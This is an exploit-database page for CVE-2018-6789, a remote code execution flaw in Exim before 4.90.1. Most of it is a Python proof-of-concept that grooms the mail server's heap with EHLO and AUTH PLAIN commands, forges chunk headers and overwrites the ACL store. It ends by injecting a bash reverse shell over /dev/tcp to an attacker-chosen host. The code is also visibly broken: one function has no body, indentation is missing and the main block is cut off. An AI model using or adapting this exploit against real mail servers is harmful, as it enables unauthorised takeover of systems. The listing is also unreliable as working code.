Exim < 4.90.1 base64d remote code execution Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2018-05-02 | Type : remote | Platform : linux
This exploit / vulnerability Exim < 4.90.1 base64d remote code execution is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

import time
import socket
import struct
s = None
f = None
def logo():
print " CVE-2018-6789 Poc Exploit"
print "@straight_blast ; straightblast426@gmail.com"
def connect(host, port):
global s
global f
s = socket.create_connection((host,port))
f = s.makefile('rw', bufsize=0)
def p(v):
return struct.pack("<Q", v)
def readuntil(delim='\n'):
data = ''
while not data.endswith(delim):
data += f.read(1)
return data
def write(data):
f.write(data + "\n")
def ehlo(v):
write("EHLO " + v)
def unrec(v):
def auth_plain(v):
encode = v.encode('base64').replace('\n','').replace('=','')
write("AUTH PLAIN " + encode)
def one_byte_overwrite():
v = "C" * 8200
encode = v.encode('base64').replace('\n','').replace('=','')
encode = encode[:-1] + "PE"
write("AUTH PLAIN " + encode)
def exploit():
connect('localhost', 25)
print "[1] connected to target"

ehlo("A" * 8000)
ehlo("B" * 16)
print "[2] created free chunk size 0x6060 in unsorted bin"

unrec("\xff" * 2000)
ehlo("D" * 8200)
print "[3] triggered 1 byte overwrite to extend target chunk size from 0x2020 to 0x20f0"

fake_header = p(0)
fake_header += p(0x1f51)
auth_plain("E" * 176 + fake_header + "E" * (8200-176-len(fake_header)))
print "[4] patched chunk with fake header so extended chunk can be freed"

ehlo("F" * 16)
print "[5] freed extended chunk"

unrec("\xff" * 2000)
unrec("\xff" * 2000)
print "[6] occupied 1st and 3rd item in unsorted bin with fillers"

fake_header = p(0x4110)
fake_header += p(0x1f50)
auth_plain("G" * 176 + fake_header + "G" * (8200-176-len(fake_header)))
print "[7] patched chunk with fake header so extended chunk can be allocated"

address = 0x55d7e5864480
auth_plain("H" * 8200 + p(0x2021) + p(address) + p(0x2008) + "H" * 184)
print "[8] overwrite 'next' pointer with ACL store block address"

ehlo("I" * 16)
print "[9] freed the ACL store block"

acl_smtp_rcpt_offset = 288
local_host = ''
local_port = 1337
cmd = "/bin/bash -c \"/bin/bash -i >& /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\""
cmd_expansion_string = "${run{" + cmd + "}}\0"
auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "J" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string)))
print "[10] malloced ACL store block and overwrite the content of 'acl_smtp_rcpt' with shell expression"

write("MAIL FROM:<test@pwned.com>")
write("RCPT TO:<shell@pwned.com>")
print "[11] triggered RCPT TO and executing shell expression ... enjoy your shell!"
if __name__ == '__main__':